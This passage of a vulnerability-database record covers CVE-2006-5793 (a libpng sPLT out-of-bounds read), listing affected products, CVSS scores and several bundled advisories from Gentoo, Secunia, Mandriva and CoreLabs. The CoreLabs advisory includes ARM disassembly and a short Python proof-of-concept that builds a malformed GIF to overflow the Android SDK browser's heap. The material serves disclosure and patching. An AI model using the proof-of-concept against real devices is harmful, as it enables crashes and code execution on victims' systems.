"vendor": "s u s e",
"version": "8.0"
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "10.1"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux professional x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "advanced workstation for the itanium processor",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.3"
},
{
"_id": null,
"model": "f...",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2006.0"
},
{
"_id": null,
"model": "message networking mn",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "enterprise linux ws ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.3"
},
{
"_id": null,
"model": "broker ftp server",
"scope": "eq",
"trust": 0.3,
"vendor": "transsoft",
"version": "8.0"
},
{
"_id": null,
"model": "propack sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "3.0"
},
{
"_id": null,
"model": "novell linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "suse linux school server for i386",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"_id": null,
"model": "multimedia",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "current",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "hat fedora core5",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"_id": null,
"model": "hat enterprise linux desktop supplementary client",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"_id": null,
"model": "2-stable-20061018",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop multi os client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"_id": null,
"model": "suse linux openexchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "4.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0.0x64"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0.1"
},
{
"_id": null,
"model": "linux professional x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"_id": null,
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "4"
},
{
"_id": null,
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "3"
},
{
"_id": null,
"model": "linux professional x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "enterprise linux optional productivity application server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
}
],
"sources": [
{
"db": "BID",
"id": "21078"
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
},
{
"db": "NVD",
"id": "CVE-2006-5793"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:libpng:libpng",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_appliance_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_fuji",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_multimedia",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_personal",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_wizpy",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_home",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
}
]
},
"credits": {
"_id": null,
"data": "Tavis Ormandy from the Gentoo Linux Security Auditing Team discovered this vulnerability.",
"sources": [
{
"db": "BID",
"id": "21078"
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
}
],
"trust": 0.9
},
"cve": "CVE-2006-5793",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"id": "CVE-2006-5793",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-5793",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2006-5793",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNNVD",
"id": "CNNVD-200611-295",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
},
{
"db": "NVD",
"id": "CVE-2006-5793"
}
]
},
"description": {
"_id": null,
"data": "The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The \u0027libpng\u0027 graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. \nAttackers may exploit this vulnerability to crash an application that relies on the affected library. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 200611-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libpng: Denial of Service\n Date: November 17, 2006\n Bugs: #154380\n ID: 200611-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA vulnerability in libpng may allow a remote attacker to crash\napplications that handle untrusted images. \n\nBackground\n==========\n\nlibpng is a free ANSI C library used to process and manipulate PNG\nimages. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.2.13 \u003e= 1.2.13\n\nDescription\n===========\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered that a\nvulnerability exists in the sPLT chunk handling code of libpng, a large\nsPLT chunk may cause an application to attempt to read out of bounds. \n\nImpact\n======\n\nA remote attacker could craft an image that when processed or viewed by\nan application using libpng causes the application to terminate\nabnormally. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.2.13\"\n\nReferences\n==========\n\n [ 1 ] CVE-2006-5793\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-200611-09.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2006 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ----------------------------------------------------------------------\n\nDo you need accurate and reliable IDS / IPS / AV detection rules?\n\nGet in-depth vulnerability details:\nhttp://secunia.com/binary_analysis/sample_analysis/\n\n----------------------------------------------------------------------\n\nTITLE:\nApache Tomcat \"RemoteFilterValve\" Security Bypass Security Issue\n\nSECUNIA ADVISORY ID:\nSA32213\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/32213/\n\nCRITICAL:\nNot critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nApache Tomcat 5.x\nhttp://secunia.com/advisories/product/3571/\nApache Tomcat 4.x\nhttp://secunia.com/advisories/product/328/\n\nDESCRIPTION:\nA security issue has been reported in Apache Tomcat, which\npotentially can be exploited by malicious people to bypass certain\nsecurity restrictions. \n\nThe security issue is caused due to a synchronisation problem when\nchecking IP addresses and can be exploited to bypass a filter valve\nthat extends \"RemoteFilterValve\" and potentially gain access to\nprotected contexts. \n\nSOLUTION:\nApache Tomcat 4.x:\nUpdate to version 4.1.32 or later. \n\nApache Tomcat 5.x:\nUpdate to version 5.5.1 or later. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Kenichi Tsukamoto of Fujitsu Limited. \n\nORIGINAL ADVISORY:\nApache:\nhttp://tomcat.apache.org/security-4.html\nhttp://tomcat.apache.org/security-5.html\nhttps://issues.apache.org/bugzilla/show_bug.cgi?id=25835\n\nJVN:\nhttp://jvn.jp/en/jp/JVN30732239/index.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n \n Mandriva Linux Security Advisory MDKSA-2006:212\n http://www.mandriva.com/security/\n _______________________________________________________________________\n \n Package : doxygen\n Date : November 16, 2006\n Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0\n _______________________________________________________________________\n \n Problem Description:\n \n Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-5793)\n\n In addition, an patch to address several old vulnerabilities has been\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\n CAN-2004-0598, CAN-2004-0599)\n\n Packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm \n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm \n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm \n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm \n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\n\n Corporate 3.0:\n 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm \n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm \n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\n\n Corporate 4.0:\n a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm \n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm \n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q\npK8OJ2vhx3DqZ400EPH5QMw=\n=R8Jo\n-----END PGP SIGNATURE-----\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs\n\nMultiple vulnerabilities in Google\u0027s Android SDK\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in Google\u0027s Android SDK\nAdvisory ID: CORE-2008-0124\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2148\nDate published: 2008-03-04\nDate of last update: 2008-03-04\nVendors contacted: Google\nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Heap overflow, integer overflow\nRemotely Exploitable: No\nLocally Exploitable: No\nBugtraq ID: 28006, 28005\t\nCVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,\nCVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269\t\n\n\n*Vulnerability Description*\n\nAndroid is project promoted primarily by Google through the Open Handset\nAlliance aimed at providing a complete set of software for mobile\ndevices: an operating system, middleware and key mobile applications\n[1]. Although the project is currently in a development phase and has\nnot made an official release yet, several vendors of mobile chips have\nunveiled prototype phones built using development releases of the\nplatform at the Mobile World Congress [2]. Development using the Android\nplatform gained activity early in 2008 as a result of Google\u0027s launch of\nthe Android Development Challenge which includes $10 million USD in\nawards [3] for which a Software Development Kit (SDK) was made available\nin November 2007. \n\n The Android Software Development Kit includes a fully functional\noperating system, a set of core libraries, application development\nframeworks, a virtual machine for executing application and a phone\nemulator based on the QEMU emulator [4]. Public reports as of February\n27th, 2008 state that the Android SDK has been downloaded 750,000 times\nsince November 2007 [5]. \n\n Several vulnerabilities have been found in Android\u0027s core libraries for\nprocessing graphic content in some of the most used image formats (PNG,\nGIF an BMP). While some of these vulnerabilities stem from the use of\noutdated and vulnerable open source image processing libraries other\nwere introduced by native Android code that use them or that implements\nnew functionality. \n\n Exploitation of these vulnerabilities to yield complete control of a\nphone running the Android platform has been proved possible using the\nemulator included in the SDK, which emulates phone running the Android\nplatform on an ARM microprocessor. \n\n This advisory contains technical descriptions of these security bugs,\nincluding a proof of concept exploit to run arbitrary code, proving the\npossibility of running code on Android stack (over an ARM architecture)\nvia a binary exploit. \n\n\n\n\n*Vulnerable Packages*\n\n. Android SDK m3-rc37a and earlier are vulnerable several bugs in\ncomponents that process GIF, PNG and BMP images (bugs #1, #2 and #3 of\nthis advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component\nthat process BMP images (bug #3). \n\n\n*Non-vulnerable Packages*\n\n. Android SDK m5-rc15\n\n\n*Vendor Information, Solutions and Workarounds*\n\nVendor statement:\n\n\"The current version of the Android SDK is an early look release to the\nopen source community, provided so that developers can begin working\nwith the platform to inform and shape our development of Android toward\nproduction readiness. The Open Handset Alliance welcomes input from the\nsecurity community throughout this process. There will be many changes\nand updates to the platform before Android is ready for end users,\nincluding a full security review.\"\n\n\n*Credits*\n\nThese vulnerabilities were discovered by Alfredo Ortega from Core\nSecurity Technologies, leading his Bugweek 2007 team called \"Pampa\nGrande\". It was researched in depth by Alfredo Ortega. \n\n\n*Technical Description / Proof of Concept Code*\n\nAndroid is a software stack for mobile devices that includes an\noperating system, middleware and key applications. Android relies on\nLinux version 2.6 for core system services such as security, memory\nmanagement, process management, network stack, and driver model. The\nkernel also acts as an abstraction layer between the hardware and the\nrest of the software stack. \n\n The WebKit application framework is included to facilitate development\nof web client application functionality. The framework in turn uses\ndifferent third-party open source libraries to implement processing of\nseveral image formats. \n\n Android includes a web browser based on the Webkit framework that\ncontains multiple binary vulnerabilities when processing .GIF, .PNG and\n.BMP image files, allowing malicious client-side attacks on the web\nbrowser. A client-side attack could be launched from a malicious web\nsite, hosting specially crafted content, with the possibility of\nexecuting arbitrary code on the victim\u0027s Android system. \n\n These client-side binary vulnerabilities were discovered using the\nAndroid SDK that includes an ARM architecture emulator. Binary\nvulnerabilities are the most common security bugs in computer software. \nBasic bibliography on these vulnerabilities includes a recently updated\nhandbook about security holes that also describes current\nstate-of-the-start exploitation techniques for different hardware\nplatforms and operating systems [6]. \n\n The vulnerabilities discovered are summarized below grouped by the type\nof image file format that is parsed by the vulnerable component. \n\n #1 - GIF image parsing heap overflow\n\nThe Graphics Interchange Format (GIF) is image format dating at least\nfrom 1989 [7]. It was popularized because GIF images can be compressed\nusing the Lempel-Ziv-Welch (LZW) compression technique thus reducing the\nmemory footprint and bandwidth required for transmission and storage. \n\n A memory corruption condition happens within the GIF processing library\nof the WebKit framework when the function \u0027GIFImageDecoder::onDecode()\u0027\nallocates a heap buffer based on the _Logical Screen Width and Height_\nfiled of the GIF header (offsets 6 and 8) and then the resulting buffer\nis filled in with an amount of data bytes that is calculated based on\nthe real Width and Height of the GIF image. There is a similar (if not\nthe same) bug in the function \u0027GIFImageDecoder::haveDecodedRow() \u0027in the\nopen-source version included by Android in\n\u0027WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\gif\\GifImageDecoder.cpp\u0027\ninside \u0027webkit-522-android-m3-rc20.tar.gz\u0027 available at [8]. \n\n Detailed analysis:\n\n When the process \u0027com.google.android.browser\u0027 must handle content with\na GIF file it loads a dynamic library called \u0027libsgl.so\u0027 which contains\nthe decoders for multiple image file formats. \n\n Decoding of the GIF image is performed correctly by the library giflib\n4.0 (compiled inside \u0027libsgl.so\u0027). However, the wrapper object\n\u0027GIFImageDecoder\u0027 miscalculates the total size of the image. \n\n First, the Logical Screen Size is read and stored in the following\ncalling sequence (As giflib is an Open Source MIT-licenced library, the\nsource was available for analysis):\n\u0027GIFImageDecoder::onDecode()-\u003eDGifOpen()-\u003eDGifGetScreenDesc()\u0027. The last\nfunction, \u0027DGifGetScreenDesc()\u0027, stores the _Logical Screen Width and\nHeight_ in a structure called \u0027GifFileType\u0027:\n\n/-----------\n\nInt DGifGetScreenDesc(GifFileType * GifFile) {\n... \n/* Put the screen descriptor into the file: */\nif (DGifGetWord(GifFile, \u0026GifFile-\u003eSWidth) == GIF_ERROR ||\nDGifGetWord(GifFile, \u0026GifFile-\u003eSHeight) == GIF_ERROR)\n return GIF_ERROR;\n ... \n }\n- -----------/\n\n We can see that the fields are stored in the first 2 words of the\nstructure:\n\n/-----------\n\ntypedef struct GifFileType {\n/* Screen dimensions. */\nGifWord SWidth, SHeight,\n... \n}\n- -----------/\n\n In the disassembly of the GIFImageDecoder::onDecode() function provided\nbelow we can see how the DGifOpen() function is called and that the\nreturn value (A GifFileType struct) is stored on the $R5 ARM register:\n\n/-----------\n\n.text:0002F234 BL _DGifOpen\n.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5\n- -----------/\n\n Then, the giflib function \u0027DGifSlurp()\u0027 is called and the Image size is\ncorrectly allocated using the Image Width and Height and not the Logical\nScreen Size:\n\n/-----------\n\nInt DGifSlurp(GifFileType * GifFile)\n{ ... ImageSize = sp-\u003eImageDesc.Width * sp-\u003eImageDesc.Height;\n sp-\u003eRasterBits = (unsigned char *)malloc(ImageSize *\nsizeof(GifPixelType));\n ... \n}\n- -----------/\n\n Afterwards the _Logical Screen_ Width and Height are stored in the R9\nand R11 registers:\n\n/-----------\n\n.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !\n- -----------/\n\n\n\n However the actual image may be much larger that these sizes that are\nincorrectly passed to a number of methods of the \u0027GIFImageDecoder\u0027:\n\n/-----------\n\nImageDecoder::chooseFromOneChoice():\n.text:0002F294 MOV R0, R8\n.text:0002F298 MOV R1, #3\n.text:0002F29C MOV R2, R9\n.text:0002F2A0 MOV R3, R11\n.text:0002F2A4 STR R12, [SP,#0x48+var_3C]\n.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;\nImageDecoder::chooseFromOneChoice(SkBitmap::Config,int\n,int)\n\nBitmap::setConfig():\n.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap\n.text:0002F2BC MOV R1, #3\n.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !\n.text:0002F2C4 MOV R3, R11\n.text:0002F2C8 STR R10, [SP,#0x48+var_48]\n.text:0002F2CC BL _Bitmap9setConfig ;\nBitmap::setConfig(SkBitmap::Config,uint,uint,uint)\n- -----------/\n\n This function stores the SWidth and SHeight inside the Bitmap object as\nshown in the following code snippet:\n\n/-----------\n\n.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7\n.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8\n.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap\n- -----------/\n\n And later:\n\n/-----------\n\n.text:00035C58 BL _Bitmap15ComputeRowBytes ;\nSkBitmap::ComputeRowBytes(SkBitmap::Config,uint)\n.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes\n.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth\n.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight\n.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes\n- -----------/\n\n The following python script generates a GIF file that causes the\noverflow. It requires the Python Imaging Library. Once generated the GIF\nfile, it must be opened in the Android browser to trigger the overflow:\n\n/-----------\n\n##Android Heap Overflow\n##Ortega Alfredo _ Core Security Exploit Writers Team\n##tested against Android SDK m3-rc37a\n\nimport Image\nimport struct\n\n#Creates a _good_ gif image\nimagename=\u0027overflow.gif\u0027\nstr = \u0027\\x00\\x00\\x00\\x00\u0027*30000\nim = Image.frombuffer(\u0027L\u0027,(len(str),1),str,\u0027raw\u0027,\u0027L\u0027,0,1)\nim.save(imagename,\u0027GIF\u0027)\n\n#Shrink the Logical screen dimension\nSWidth=1\nSHeight=1\n\nimg = open(imagename,\u0027rb\u0027).read()\nimg = img[:6]+struct.pack(\u0027\u003cHH\u0027,SWidth,SHeight)+img[10:]\n\n#Save the _bad_ gif image\nq=open(imagename,\u0027wb=\"\"\u0027)\nq.write(img)\nq.close()\n- -----------/\n\n This security bug affects Android SDK m3-rc37a and earlier versions. \nVersion m5-rc14 of the Android SDK includes a fix and is not vulnerable\nto this bug. \n\n #2 - PNG image parsing, multiple vulnerabilities:\n\n The Portable Network Graphics (PNG) is a bitmapped image format that\nemploys lossless data compression [9]. PNG was created to improve upon\nand replace the GIF format as an image file format that does not require\na patent license. \n\n The library \u0027libsgl.so\u0027 used by Android\u0027s WebKit contains commonly used\ncode to load graphic files, as libpng, giflib and others. The version\ninside libsgl.so distributed with Android SDK m3-rc37a and earlier\nversions include the string \u0027\"libpng version 1.2.8 - December 3, 2004\"\u0027. \nSource code inspection of the file\n\u0027\\WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\png\\png.c\u0027 included\nin the \u0027webkit-522-android-m3-rc20.tar.gz \u0027 release of the Android\nproject reveals that \u0027\"libpng version 1.2.7 - September\n 12, 2004\"\u0027 has been used in this release. \n\n This old version of libpng makes Android SDK m3-rc37a and earlier\nversions vulnerable to the following known issues: \u0027 CVE-2006-5793,\nCVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,\nCVE-2007-5269 \u0027. \n\nAndroid version m5-rc14 has been updated to include libpng 1.2.24 and is\nlikely not vulnerable. \n\n #3 - BMP image processing, negative offset integer overflow:\n\n The BMP file format, sometimes called bitmap or DIB file format (for\ndevice-independent bitmap), is an image file format used to store bitmap\ndigital images, especially on Microsoft Windows and OS/2 operating\nsystems [10]. \n\n The integer overflow is caused when a Windows Bitmap file (.BMP) header\nis parsed in the method \u0027BMP::readFromStream(Stream *,\n 